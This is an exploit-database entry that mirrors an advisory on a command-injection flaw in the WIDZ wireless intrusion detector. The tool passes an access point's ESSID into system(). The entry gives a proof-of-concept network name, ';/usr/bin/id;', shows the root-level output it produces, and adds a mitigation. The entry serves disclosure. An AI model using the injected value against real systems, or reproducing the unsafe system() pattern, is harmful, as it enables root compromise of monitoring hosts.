header-logo
Suggest Exploit
vendor:
N/A
by:
SecurityFocus
7,5
CVSS
HIGH
Command Injection
78
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apple Airport
2002

WIDZ does not validate untrusted input when generating alerts

WIDZ does not validate untrusted input when generating alerts. Alerts pass the essid of an unknown wireless access point through a system() call. By setting the essid of an unauthorized access point to include malformed information, the underlying operating system may be compromised. Go to Apple Airport and set network name to ';/usr/bin/id; This will generate the following message: unknown AP essid= uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) sh: -c: line 3: unexpected EOF while looking for matching `'' sh: -c: line 4: syntax error: unexpected end of file

Mitigation:

Validate untrusted input when generating alerts.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8479/info

WIDZ does not validate untrusted input when generating alerts. Alerts pass the essid of an unknown wireless access point through a system() call. By setting the essid of an unauthorized access point to include malformed information, the underlying operating system may be compromised. 

Go to Apple Airport and set network name to ';/usr/bin/id;

This will generate the following message:
unknown AP essid=
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh: -c: line 3: unexpected EOF while looking for matching `''
sh: -c: line 4: syntax error: unexpected end of file